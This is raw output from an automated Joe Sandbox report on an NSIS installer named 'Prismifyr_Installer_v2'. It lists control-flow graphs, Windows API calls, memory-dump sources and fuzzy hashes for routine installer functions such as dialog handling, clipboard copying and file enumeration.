                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                          • API String ID: 424501083-3195845224
                                                                                                                                                                                                                          • Opcode ID: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                                                          • Instruction ID: 33fbdd78d52bfd04f2c73b4da217482bb076a8c6d1615cdfa2cd3638f3c4bec2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D1F471100310AAE720BF769D45B2B3AADEB4070AF10447FF885B62E1DBBD8D55876E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 137 405461-40547c 138 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 40560b-405612 137->139 160 405567-40556a 138->160 161 40554b-405565 SendMessageW * 2 138->161 141 405614-405636 GetDlgItem CreateThread CloseHandle 139->141 142 40563c-405649 139->142 141->142 144 405667-405671 142->144 145 40564b-405651 142->145 149 405673-405679 144->149 150 4056c7-4056cb 144->150 147 405653-405662 ShowWindow * 2 call 404266 145->147 148 40568c-405695 call 404298 145->148 147->144 157 40569a-40569e 148->157 155 4056a1-4056b1 ShowWindow 149->155 156 40567b-405687 call 40420a 149->156 150->148 153 4056cd-4056d3 150->153 153->148 162 4056d5-4056e8 SendMessageW 153->162 158 4056c1-4056c2 call 40420a 155->158 159 4056b3-4056bc call 405322 155->159 156->148 158->150 159->158 166 40557a-405591 call 404231 160->166 167 40556c-405578 SendMessageW 160->167 161->160 168 4057ea-4057ec 162->168 169 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 162->169 176 405593-4055a7 ShowWindow 166->176 177 4055c7-4055e8 GetDlgItem SendMessageW 166->177 167->166 168->157 174 40571b-40572b GetWindowRect 169->174 175 40572e-405743 TrackPopupMenu 169->175 174->175 175->168 179 405749-405760 175->179 180 4055b6 176->180 181 4055a9-4055b4 ShowWindow 176->181 177->168 178 4055ee-405606 SendMessageW * 2 177->178 178->168 182 405765-405780 SendMessageW 179->182 183 4055bc-4055c2 call 404266 180->183 181->183 182->182 184 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 4057a7-4057ce SendMessageW 184->186 186->186 187 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                                            • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: <#j${
                                                                                                                                                                                                                          • API String ID: 590372296-1661707694
                                                                                                                                                                                                                          • Opcode ID: 3f5756e17ddf514bb7e58e27119461a6e63aa272c655e6837988b65713ff16ec
                                                                                                                                                                                                                          • Instruction ID: bae72a1d173c3811f2fd5642bc5838002141c6bee16c4b6d0499208050eeb164
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f5756e17ddf514bb7e58e27119461a6e63aa272c655e6837988b65713ff16ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CB12970900608FFDB119FA0DE89EAE7B79FB48354F00413AFA45A61A0CBB55E91DF58

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 497 4059cc-4059f2 call 405c97 500 4059f4-405a06 DeleteFileW 497->500 501 405a0b-405a12 497->501 502 405b88-405b8c 500->502 503 405a14-405a16 501->503 504 405a25-405a35 call 4062ba 501->504 505 405b36-405b3b 503->505 506 405a1c-405a1f 503->506 510 405a44-405a45 call 405bdb 504->510 511 405a37-405a42 lstrcatW 504->511 505->502 509 405b3d-405b40 505->509 506->504 506->505 512 405b42-405b48 509->512 513 405b4a-405b52 call 4065fd 509->513 514 405a4a-405a4e 510->514 511->514 512->502 513->502 521 405b54-405b68 call 405b8f call 405984 513->521 517 405a50-405a58 514->517 518 405a5a-405a60 lstrcatW 514->518 517->518 520 405a65-405a81 lstrlenW FindFirstFileW 517->520 518->520 522 405a87-405a8f 520->522 523 405b2b-405b2f 520->523 537 405b80-405b83 call 405322 521->537 538 405b6a-405b6d 521->538 527 405a91-405a99 522->527 528 405aaf-405ac3 call 4062ba 522->528 523->505 526 405b31 523->526 526->505 531 405a9b-405aa3 527->531 532 405b0e-405b1e FindNextFileW 527->532 539 405ac5-405acd 528->539 540 405ada-405ae5 call 405984 528->540 531->528 533 405aa5-405aad 531->533 532->522 536 405b24-405b25 FindClose 532->536 533->528 533->532 536->523 537->502 538->512 541 405b6f-405b7e call 405322 call 406080 538->541 539->532 542 405acf-405ad3 call 4059cc 539->542 550 405b06-405b09 call 405322 540->550 551 405ae7-405aea 540->551 541->502 549 405ad8 542->549 549->532 550->532 554 405aec-405afc call 405322 call 406080 551->554 555 405afe-405b04 551->555 554->532 555->532
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,004DF000,76233420,00000000), ref: 004059F5
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,?,?,004DF000,76233420,00000000), ref: 00405A3D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,?,?,004DF000,76233420,00000000), ref: 00405A60
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,?,?,004DF000,76233420,00000000), ref: 00405A66
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*,?,?,004DF000,76233420,00000000), ref: 00405A76
                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\*.*$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-3913295494
                                                                                                                                                                                                                          • Opcode ID: 381ae1539308b0fff5c23660480c7799636f68814d34eb948432fba1f876741c
                                                                                                                                                                                                                          • Instruction ID: 3baa02bdf70247edfb0f680676f8bffda79515ede8bd61e7e13478a9eee65f3b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 381ae1539308b0fff5c23660480c7799636f68814d34eb948432fba1f876741c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E141D430900914AACB21AB618C89ABF7778EF45369F10427FF801711D1D77CAD81DE6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(004DF000,00468298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420), ref: 00406608
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID: C:\
                                                                                                                                                                                                                          • API String ID: 2295610775-3404278061
                                                                                                                                                                                                                          • Opcode ID: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                                                          • Instruction ID: 086872f0bf6ffc0fec3bf9e050170664210a11ef237051a194e92f35cf11c1a2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D012315455205BC7001B386E0C85B7B599F553317158F37F46AF51E0DB758C62869D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                                                                          • Opcode ID: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                                                          • Instruction ID: 6590b0d0bd135a94e5278e34c2007f8374f9804fe0c2ec815525577e7f77d17f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 188 403d58-403d6a 189 403d70-403d76 188->189 190 403eab-403eba 188->190 189->190 191 403d7c-403d85 189->191 192 403f09-403f1e 190->192 193 403ebc-403ef7 GetDlgItem * 2 call 404231 KiUserCallbackDispatcher call 40140b 190->193 196 403d87-403d94 SetWindowPos 191->196 197 403d9a-403d9d 191->197 194 403f20-403f23 192->194 195 403f5e-403f63 call 40427d 192->195 216 403efc-403f04 193->216 199 403f25-403f30 call 401389 194->199 200 403f56-403f58 194->200 207 403f68-403f83 195->207 196->197 202 403db7-403dbd 197->202 203 403d9f-403db1 ShowWindow 197->203 199->200 221 403f32-403f51 SendMessageW 199->221 200->195 206 4041fe 200->206 208 403dd9-403ddc 202->208 209 403dbf-403dd4 DestroyWindow 202->209 203->202 214 404200-404207 206->214 212 403f85-403f87 call 40140b 207->212 213 403f8c-403f92 207->213 217 403dde-403dea SetWindowLongW 208->217 218 403def-403df5 208->218 215 4041db-4041e1 209->215 212->213 224 403f98-403fa3 213->224 225 4041bc-4041d5 DestroyWindow EndDialog 213->225 215->206 223 4041e3-4041e9 215->223 216->192 217->214 219 403e98-403ea6 call 404298 218->219 220 403dfb-403e0c GetDlgItem 218->220 219->214 226 403e2b-403e2e 220->226 227 403e0e-403e25 SendMessageW IsWindowEnabled 220->227 221->214 223->206 229 4041eb-4041f4 ShowWindow 223->229 224->225 230 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 224->230 225->215 231 403e30-403e31 226->231 232 403e33-403e36 226->232 227->206 227->226 229->206 258 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 230->258 259 403ff8-403ffd 230->259 235 403e61-403e66 call 40420a 231->235 236 403e44-403e49 232->236 237 403e38-403e3e 232->237 235->219 241 403e7f-403e92 SendMessageW 236->241 242 403e4b-403e51 236->242 240 403e40-403e42 237->240 237->241 240->235 241->219 246 403e53-403e59 call 40140b 242->246 247 403e68-403e71 call 40140b 242->247 256 403e5f 246->256 247->219 255 403e73-403e7d 247->255 255->256 256->235 262 404041 258->262 263 40403e-40403f 258->263 259->258 264 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404073-404084 SendMessageW 264->265 266 404086 264->266 267 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 265->267 266->267 267->207 278 4040d1-4040d3 267->278 278->207 279 